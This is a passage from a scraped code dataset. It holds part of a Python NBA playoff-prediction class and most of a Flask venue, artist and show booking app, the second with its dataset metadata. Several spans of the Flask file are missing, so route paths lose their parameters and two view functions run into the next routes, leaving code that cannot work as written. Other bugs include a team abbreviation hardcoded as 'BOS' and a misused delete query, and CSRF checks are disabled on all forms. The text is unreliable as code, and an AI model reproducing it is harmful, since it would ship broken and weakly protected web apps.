summary.\"\"\"\n regular_boxes = self.regular_boxes.copy()\n regular_boxes_summary = (\n regular_boxes[\n [\n \"TEAM_ID\",\n \"PLAYER_ID\",\n \"MIN\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ]\n .fillna(0)\n .groupby([\"PLAYER_ID\", \"TEAM_ID\"])\n .agg([\"mean\"])\n .reset_index()\n )\n regular_boxes_summary.columns = regular_boxes_summary.columns.map(\n lambda x: \"_\".join(x)\n )\n regular_boxes_summary = regular_boxes_summary.rename(\n columns={\"PLAYER_ID_\": \"PLAYER_ID\", \"TEAM_ID_\": \"TEAM_ID\"}\n ).copy()\n return regular_boxes_summary\n\n @property\n def playoff_game_data(self) -> None:\n \"\"\"Set playoff game data in object cache in wide format.\"\"\"\n if self.playoff_game_data_cache.shape[0] == 0:\n print(\"---->Loading playoff game data for this year for the first time...\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n ).get_data_frames()[0].query(\"TEAM_ID in @nba_team_ids\").query(\"WL.notna()\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_playoff_game_data\n > datetime.timedelta(seconds=3600)\n ):\n print(\"Updating playoff game data.\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n self.update_timestamp_playoff_game_data = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.playoff_game_data_cache\n all_games[\"HOME_AWAY\"] = [\n \"H\" if x == 1 else \"A\" for x in all_games.MATCHUP.str.contains(\"vs\")\n ]\n all_games = all_games[\n [\n \"GAME_ID\",\n \"GAME_DATE\",\n \"HOME_AWAY\",\n \"TEAM_ID\",\n \"TEAM_ABBREVIATION\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ].copy()\n all_games = all_games.pivot(index=\"GAME_ID\", columns=\"HOME_AWAY\").reset_index()\n all_games.columns = all_games.columns.map(lambda x: \"_\".join(x))\n all_games[\"OUTCOME\"] = [\n 0 if PLUS_MINUS_H < 0 else 1 for PLUS_MINUS_H in all_games.PLUS_MINUS_H\n ]\n all_games = (\n all_games.rename(\n columns={\"GAME_DATE_H\": \"GAME_DATE\", \"GAME_ID_\": \"GAME_ID\"}\n )\n .drop([\"GAME_DATE_A\"], axis=1)\n .copy()\n )\n self.playoff_game_data_cache = all_games.query(\n \"TEAM_ID_H in @nba_team_ids & TEAM_ID_A in @nba_team_ids\"\n )\n return self.playoff_game_data_cache\n\n @property\n def playoff_boxes(self):\n \"\"\"Load player boxes for all playoff games.\"\"\"\n if self.playoff_boxes_cache.shape[0] == 0:\n print(\n \"---->Loading playoff player box data for this year for the first time...\"\n )\n post_boxes = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_playoff_boxes\n > datetime.timedelta(seconds=3600)\n ):\n print(\"---->Updating playoff box season game data.\")\n post_boxes = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n self.update_timestamp_playoff_boxes = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.playoff_boxes_cache\n playoff_boxes_cache = post_boxes[\n [\n \"GAME_ID\",\n \"TEAM_ID\",\n \"PLAYER_ID\",\n \"GAME_DATE\",\n \"MIN\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ]\n check_play_time_dist = self.regular_boxes_summary.copy()\n check_play_time_dist[\n \"Regular_Season_Play_Time_Rank\"\n ] = check_play_time_dist.groupby(\"TEAM_ID\").MIN_mean.rank(ascending=False)\n player_team_rank = check_play_time_dist[\n [\"PLAYER_ID\", \"Regular_Season_Play_Time_Rank\"]\n ]\n self.playoff_boxes_cache = playoff_boxes_cache.merge(\n player_team_rank, how=\"left\", on=\"PLAYER_ID\"\n )\n return self.playoff_boxes_cache\n\n def get_playoff_results_up_to_date(self, date: str): # Input string as \"%Y-%m-%d\"\n \"\"\"Get current playoff results.\"\"\"\n return self.playoff_game_data.query(\"GAME_DATE < @date\")\n\n def get_team_rosters_from_regular_season(self):\n \"\"\"Organize dictionary where keys are team_ids and items are lists of player_ids.\"\"\"\n rosters_df = self.roster_info[[\"PLAYER_ID\", \"TEAM_ID\"]].drop_duplicates()\n rosters_dict = {\n team: players.tolist()\n for team, players in rosters_df.groupby(\"TEAM_ID\")[\"PLAYER_ID\"]\n }\n return rosters_dict\n\n def get_players_played_in_each_playoff_game(self):\n \"\"\"Organize nested dictionary where outer key is team_id inner key is game_date and item is list of player_ids.\"\"\"\n played = self.playoff_boxes[[\"TEAM_ID\", \"PLAYER_ID\", \"GAME_ID\"]]\n nested_dict = {team: dict() for team in played.TEAM_ID.unique()}\n for team in nested_dict.keys():\n played_team = played.query(\"TEAM_ID == @team\")\n nested_dict[team].update(\n {\n game_id: players.tolist()\n for game_id, players in played_team.groupby(\"GAME_ID\")[\"PLAYER_ID\"]\n }\n )\n return nested_dict\n\n @property\n def sit_or_injured_playoff(self):\n \"\"\"Gets whether players sat on each playoff game date for year in nested dict.\"\"\"\n if len(self.injured_cache) == 0 or (\n (datetime.datetime.now().year in [self.year, self.year + 1])\n and (\n datetime.datetime.now() - self.update_timestamp_sit_or_injured_playoff\n > datetime.timedelta(seconds=3600)\n )\n ):\n roster_dict = self.get_team_rosters_from_regular_season()\n played_dict = self.get_players_played_in_each_playoff_game()\n injury_dict = {\n team: {\n game_id: [\n player\n for player in roster_dict[team]\n if player not in played_dict.get(team, {}).get(game_id, [])\n ]\n for game_id in played_dict.get(team, {}).keys()\n }\n for team in roster_dict.keys()\n }\n self.injured_cache = injury_dict\n self.update_timestamp_sit_or_injured_playoff = datetime.datetime.now()\n return self.injured_cache\n\n def reweight_replacements_for_missing_player(\n self, possible_replacement_player_ids, remove_injured, injured_player_id\n ):\n \"\"\"Reweights replacement players for ONE missing player.\"\"\"\n if len(possible_replacement_player_ids) == 0:\n raise KeyError(\"No valid replacements.\")\n team_id = remove_injured.reset_index(drop=1).TEAM_ID[0]\n possile_replacement_box_summary = self.regular_boxes_summary.query(\n \"(PLAYER_ID in @possible_replacement_player_ids) & (TEAM_ID == @team_id)\"\n ).sort_values(by=\"MIN_mean\", ascending=False)\n min_diff = (\n self.regular_boxes_summary.query(\"PLAYER_ID == @injured_player_id\")\n .reset_index(drop=0)\n .MIN_mean[0]\n )\n max_minutes = (\n min_diff.copy()\n ) # set max minutes to number of minutes adjusted player was playing and incriment up if needed\n if min_diff <= 0:\n return pd.DataFrame(columns=[\"PLAYER_ID\"])\n while (min_diff > 0) & (max_minutes <= 48):\n replacement_df = []\n for index, row in possile_replacement_box_summary.iterrows():\n if (min_diff > 0) & (row.MIN_mean < max_minutes):\n min_diff = min_diff - (max_minutes - row.MIN_mean)\n if min_diff < 0:\n player_min_new = max_minutes + min_diff\n else:\n player_min_new = max_minutes\n prop_orig_time = player_min_new / row.MIN_mean\n updated_stats = (\n pd.DataFrame(row)\n .T.drop(\n [\n \"PLAYER_ID\",\n \"TEAM_ID\",\n \"FG_PCT_mean\",\n \"FG3_PCT_mean\",\n \"FT_PCT_mean\",\n \"PLUS_MINUS_mean\",\n ],\n axis=1,\n )\n .mul(prop_orig_time, axis=0)\n .copy()\n )\n updated_stats[\"FG_PCT_mean\"] = (\n updated_stats.FGM_mean / updated_stats.FGA_mean\n )\n updated_stats[\"FG3_PCT_mean\"] = (\n updated_stats.FG3M_mean / updated_stats.FG3A_mean\n )\n updated_stats[\"FT_PCT_mean\"] = (\n updated_stats.FTM_mean / updated_stats.FTA_mean\n )\n updated_stats[\"PLAYER_ID\"] = row.PLAYER_ID\n updated_stats[\"TEAM_ID\"] = row.TEAM_ID\n replacement_df.append(updated_stats)\n max_minutes += 1\n replacement_df = pd.concat(replacement_df)\n if min_diff > 0:\n raise KeyError(\n f\"Warning: Not enough eligible players on bench to account for all injuries with full 40 minutes of play for injury_id {injured_player_id}.\"\n )\n return replacement_df\n\n def get_team_record(self, team_abb):\n \"\"\"Get win loss record.\"\"\"\n home_games = np.array(\n self.game_data.query(\"TEAM_ABBREVIATION_H == 'BOS'\").OUTCOME\n )\n away_games = 1 - np.array(\n self.game_data.query(\"TEAM_ABBREVIATION_A == 'BOS'\").OUTCOME\n )\n return np.mean(np.append(home_games, away_games))\n\n def reweight_stats(\n self, team_id, game_id, avg_minutes_played_cutoff, games_ahead_of_today\n ):\n \"\"\"Get injury reweighted predicted stats.\"\"\"\n if game_id == 0:\n injured = [\n player_id\n for player_id in scrape_current_nba_injuries(\n games_ahead_of_today\n ).PLAYER_ID\n if not math.isnan(player_id)\n ]\n else:\n injured = self.sit_or_injured_playoff[team_id][game_id]\n on_roster_still = self.get_team_rosters_from_regular_season()[team_id]\n # Only considered injury needing replacement if average minutes is greater than 30\n injured = (\n self.regular_boxes_summary.query(\n \"(TEAM_ID == @team_id) & (PLAYER_ID in @injured) & (MIN_mean > 25) & (PLAYER_ID in @on_roster_still)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n ) # remove players below injury adjustment cutoff (we dont care if a player that doesnt play is injured)\n remove_injured = self.regular_boxes_summary.query(\n \"(PLAYER_ID not in @injured) & (PLAYER_ID in @on_roster_still) & (TEAM_ID == @team_id)\"\n )\n for injured_player_id in injured:\n try:\n injured_pos = (\n self.roster_info.query(\"PLAYER_ID == @injured_player_id\")\n .reset_index(drop=1)\n .POSITION[0]\n )\n except KeyError:\n continue # player is no longer on roster\n # Possible Positions: ['G-F', 'F-G', 'G', 'C', 'F-C', 'F', 'C-F']\n if (injured_pos == \"G-F\") or (injured_pos == \"F-G\"):\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('G' in POSITION | 'F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"G\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('G' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"C\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('C' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if (injured_pos == \"F-C\") or (injured_pos == \"C-F\"):\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('C' in POSITION | 'F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"F\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n else:\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n try:\n replacement_df = self.reweight_replacements_for_missing_player(\n possible_replacement_player_ids=possible_replacement_player_ids,\n remove_injured=remove_injured,\n injured_player_id=injured_player_id,\n )\n except KeyError: # if none left in position move to other positions\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n replacement_df = self.reweight_replacements_for_missing_player(\n possible_replacement_player_ids=possible_replacement_player_ids,\n remove_injured=remove_injured,\n injured_player_id=injured_player_id,\n )\n replaced_player_ids = replacement_df.PLAYER_ID.tolist()\n remove_injured = pd.concat(\n [\n remove_injured.query(\"PLAYER_ID not in @replaced_player_ids\"),\n replacement_df,\n ]\n )\n return remove_injured.drop([\"TEAM_ID\", \"PLUS_MINUS_mean\"], axis=1)\n\n def get_regular_season_summary_stats_unadjusted(self, team_id):\n \"\"\"Get team regular season summary statistics for all teams.\"\"\"\n on_roster_still = self.get_team_rosters_from_regular_season()[team_id]\n players_summary = self.regular_boxes_summary.query(\n \"(PLAYER_ID in @on_roster_still) & (TEAM_ID == @team_id)\"\n )\n return players_summary.drop([\"TEAM_ID\", \"PLUS_MINUS_mean\"], axis=1)\n\n def get_home_win_percentage(self, team_id):\n \"\"\"Get home win percentage for team.\"\"\"\n return self.game_data.query(\"TEAM_ID_H == @team_id\").OUTCOME.mean()\n\n def get_away_win_percentage(self, team_id):\n \"\"\"Get away win percentage for team.\"\"\"\n return 1 - self.game_data.query(\"TEAM_ID_A == @team_id\").OUTCOME.mean()\n\n def feature_creator(\n self,\n home_team,\n away_team,\n game_id,\n injury_adjusted: bool,\n avg_minutes_played_cutoff,\n games_ahead_of_today,\n ):\n \"\"\"Define feature creator.\"\"\"\n if injury_adjusted:\n home_reweighted = (\n self.reweight_stats(\n team_id=home_team,\n game_id=game_id,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_H\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = home_reweighted.shape[0]\n home_reweighted = (\n home_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n home_reweighted.columns = [\n \"_\".join(map(str, c)) for c in home_reweighted.columns\n ]\n home_reweighted[\"depth_at_cutoff_H\"] = depth_at_cutoff\n home_reweighted[\"home_win_percentage\"] = self.get_home_win_percentage(\n away_team\n )\n away_reweighted = (\n self.reweight_stats(\n team_id=away_team,\n game_id=game_id,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_A\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = away_reweighted.shape[0]\n away_reweighted = (\n away_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n away_reweighted.columns = [\n \"_\".join(map(str, c)) for c in away_reweighted.columns\n ]\n away_reweighted[\"depth_at_cutoff_A\"] = depth_at_cutoff\n away_reweighted[\"road_win_percentage\"] = self.get_away_win_percentage(\n away_team\n )\n else:\n home_reweighted = (\n self.get_regular_season_summary_stats_unadjusted(team_id=home_team)\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_H\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = home_reweighted.shape[0]\n home_reweighted = (\n home_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n home_reweighted.columns = [\n \"_\".join(map(str, c)) for c in home_reweighted.columns\n ]\n home_reweighted[\"depth_at_cutoff_H\"] = depth_at_cutoff\n home_reweighted[\"home_win_percentage\"] = self.get_home_win_percentage(\n away_team\n )\n away_reweighted = (\n self.get_regular_season_summary_stats_unadjusted(team_id=away_team)\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_A\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = away_reweighted.shape[0]\n away_reweighted = (\n away_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n away_reweighted.columns = [\n \"_\".join(map(str, c)) for c in away_reweighted.columns\n ]\n away_reweighted[\"depth_at_cutoff_A\"] = depth_at_cutoff\n away_reweighted[\"road_win_percentage\"] = self.get_away_win_percentage(\n away_team\n )\n adjusted_df = pd.concat([home_reweighted, away_reweighted], axis=1)\n return adjusted_df\n\n def get_features_for_game(\n self, game_id, injury_adjusted: bool, avg_minutes_played_cutoff\n ):\n \"\"\"Return model features for past game.\"\"\"\n game = self.playoff_game_data.query(\"GAME_ID == @game_id\")\n if game.empty:\n raise IndexError(\n \"Game requested is not a valid playoff game for this year.\"\n )\n home_team = game.reset_index(drop=1).TEAM_ID_H[0]\n away_team = game.reset_index(drop=1).TEAM_ID_A[0]\n features = self.feature_creator(\n home_team=home_team,\n away_team=away_team,\n game_id=game_id,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=0,\n )\n return features\n\n def get_features_for_upcoming(\n self,\n home_team,\n away_team,\n injury_adjusted,\n avg_minutes_played_cutoff,\n games_ahead_of_today,\n ):\n \"\"\"Return model features for upcoming game.\"\"\"\n features = self.feature_creator(\n home_team=home_team,\n away_team=away_team,\n game_id=0,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n return features\n\n def get_train_for_all_playoff_games(\n self, injury_adjusted: bool, avg_minutes_played_cutoff: int\n ):\n \"\"\"Return dataframe of all adjusted features and game outcomes for this year.\"\"\"\n features = []\n for _, row in self.playoff_game_data.iterrows():\n feature = self.get_features_for_game(\n game_id=row.GAME_ID,\n injury_adjusted=injury_adjusted,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n )\n feature[\"HOME_WIN\"] = row.OUTCOME\n features.append(feature)\n return pd.concat(features)\n","repo_name":"wpowell31/biostats-821-final-project","sub_path":"objects/year.py","file_name":"year.py","file_ext":"py","file_size_in_byte":31782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15061001925","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom models import Venue, Artist, Show, db , app\nimport collections\ncollections.Callable = collections.abc.Callable\nimport sys\nfrom flask_wtf.csrf import CSRFProtect\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n\nmoment = Moment(app)\napp.config.from_object('config')\ndb.init_app(app)\n#csrf = CSRFProtect(app), keep getting errors, still working on it\n#embedded the csrf token in the corresponding html pages as hidden\n\n\n# TODO: connect to a local postgresql database\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n \n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n# TypeError: Parser must be a string or character stream, not datetime, to fix this error included the \n# if isinstance(value,str) to use Show.start_time as a parameter in def show()\ndef format_datetime(value, format='medium'):\n if isinstance(value, str):\n date = dateutil.parser.parse(value)\n else:\n date = value \n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format, locale='en')\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n# TODO: replace with real venues data.\n# num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\n data = []\n #first search to get the cities and states\n first_search= Venue.query.distinct(Venue.city,Venue.state).all()#using order_by isnt listing unique values\n now=datetime.now()\n for venue in first_search:\n #data.append({\"city\":venue.city,\"state\":venue.state}),appending to data initially results a display with a quotation, and redundent venues\n ##we get the inital output :New York, NY,San Francisco, CA\n #second search to filter venues according to their state and city\n second_search = Venue.query.filter_by(state=venue.state).filter_by(city=venue.city).all()\n venues = []\n #setting the venues to empty list value out of the for loop results in redundent venues output\n for value in second_search:\n #fetching upcoming shows by comparing to current time \n num_upcoming_shows=len(Show.query.filter(Show.start_time >now).all()) \n venues.append({\n \"id\": value.id,\n \"name\": value.name, \n \"num_upcoming_shows\":num_upcoming_shows})\n data.append({\"city\": venue.city,\"state\": venue.state, \"venues\": venues })\n \n return render_template('pages/venues.html', areas=data)\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # same function used in search_artist,had to included the search_term definition in the funtion inorder to work \n # from the search_venues.html we could utilize the 'count' to display the number of items found \n search_term=request.form.get('search_term', '')\n result=Venue.query.filter(Venue.name.ilike(f'%{search_term}%')).all()\n response={'data':result,'count':len(result)}\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n venue= Venue.query.get(venue_id)\n now=datetime.now()\n upcoming_show_query=db.session.query(Show).join(Artist).filter(Show.venue_id==venue_id).filter(Show. start_time>now).all() \n past_show_query=db.session.query(Show).join(Artist).filter(Show.venue_id==venue_id).filter(Show. start_time', methods=['DELETE'])\ndef delete_venue(venue_id):\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n try:\n Venue.query.filter_by(Venue.id==venue_id).delete()\n db.session.commit()\n flash('Selected venue deleted')\n except:\n db.session.rollback()\n flash('An error occurred. can not delete selected venue' )\n finally:\n db.session.close()\n return render_template('pages/home.html')\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n #order_by parameter can be added to display artist values according to their ID or name or any other attribute\n data=Artist.query.all()\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # same function used in search_venue()\n # from the search_venues.html we could utilize the 'count' to display the number of items found \n search_term=request.form.get('search_term', '')\n result=Artist.query.filter(Artist.name.ilike(f'%{search_term}%')).all()\n response={'data':result,'count':len(result)}\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n artist= Artist.query.get(artist_id)\n now=datetime.now()\n upcoming_show_query=db.session.query(Show).join(Venue).filter(Show.artist_id==artist_id).filter(Show. start_time>now).all() \n past_show_query=db.session.query(Show).join(Venue).filter(Show.artist_id==artist_id).filter(Show. start_time/edit', methods=['GET'])\ndef edit_artist(artist_id):\n ##utilized form.populate_obj(venue_id), but I noticed that I have to fetch genres separately\n artist= Artist.query.get_or_404(artist_id)\n form =ArtistForm(obj=artist)\n form.genres.data=artist.genres\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id): \n artist= Artist.query.get_or_404(artist_id)\n form = ArtistForm(meta={'csrf': False})\n if form.validate_on_submit():\n try: \n artist.name = form.name.data\n artist.genres = form.genres.data\n artist.city = form.city.data\n artist.state = form.state.data\n artist.phone = form.phone.data\n artist.website_link = form.website_link.data\n artist.facebook_link = form.facebook_link.data\n artist.seeking_venue = form.seeking_venue.data\n artist.seeking_description = form.seeking_description.data\n artist.image_link = form.image_link.data\n db.session.commit()\n flash('Artist' + \" \" + request.form['name'] + ' was successfully updated!')\n except:\n flash('An error occurred. Artist' + request.form['name'] + ' could not be edited.')\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close() \n else: \n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger')\n return render_template('forms/edit_artist.html', form=form, artist=artist) \n return redirect(url_for('show_artist', artist_id=artist_id))\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n #utilize form.populate_obj(venue_id), but I noticed that I have to fetch genres separately\n venue= Venue.query.get_or_404(venue_id)\n form=VenueForm(obj=venue)\n form.genres.data=venue.genres\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n venue= Venue.query.get_or_404(venue_id)\n form = VenueForm(meta={'csrf': False})\n if form.validate_on_submit():\n venue.name=form.name.data\n venue.genres=form.genres.data\n venue.address=form.address.data\n venue.city=form.city.data\n venue.state=form.state.data\n venue.phone=form.phone.data\n venue.website_link=form.website_link.data\n venue.facebook_link=form.facebook_link.data\n venue.seeking_talent=form.seeking_talent.data\n venue.seeking_description=form.seeking_description.data\n venue.image_link=form.image_link.data\n try:\n db.session.commit()\n flash('Venue' + \" \" + request.form['name'] + ' was successfully updated!')\n except:\n flash('An error occurred. Venue' + request.form['name'] + ' could not be edited.')\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close() \n else:\n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger') \n return render_template('forms/edit_venue.html', form=form, venue=venue) \n return redirect(url_for('show_venue', venue_id=venue_id))\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n form =ArtistForm(meta={'csrf': False})\n if form.validate_on_submit():\n try:\n new_artist =Artist(\n name=form.name.data,\n city=form.city.data,\n state=form.state.data,\n phone=form.phone.data,\n genres=\" \".join(form.genres.data),\n image_link=form.image_link.data,\n facebook_link=form.facebook_link.data,\n seeking_description=form.seeking_description.data,\n website_link=form.website_link.data,\n seeking_venue=form.seeking_venue.data)\n db.session.add(new_artist)\n db.session.commit()\n # on successful db insert, flash success\n flash('Artist' + \" \" + request.form['name'] + ' was successfully added!')\n except: \n # TODO: on unsuccessful db insert, flash an error instead.\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be added.')\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close() \n else:\n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger')\n return render_template('forms/new_artist.html', form=form) \n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n shows = Show.query.order_by(Show.start_time).all()\n data = []\n for show in shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name,\n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time\n })\n \n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead \n form = ShowForm(meta={'csrf': False})\n if form.validate_on_submit():\n try:\n new_show= Show(\n artist_id = form.artist_id.data,\n venue_id = form.venue_id.data,\n start_time = form.start_time.data\n )\n db.session.add(new_show)\n db.session.commit()\n # on successful db insert, flash success\n flash('Show was successfully listed!')\n except:\n # TODO: on unsuccessful db insert, flash an error instead.\n # included the print(sys.exc_info()), to read errors on the terminal\n db.session.rollback()\n flash('An error occurred. Show could not be listed.')\n print(sys.exc_info())\n finally:\n db.session.rollback()\n else:\n for field, message in form.errors.items():\n flash(field + ' - ' + str(message), 'danger')\n return render_template('forms/new_show.html', form=form) \n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# 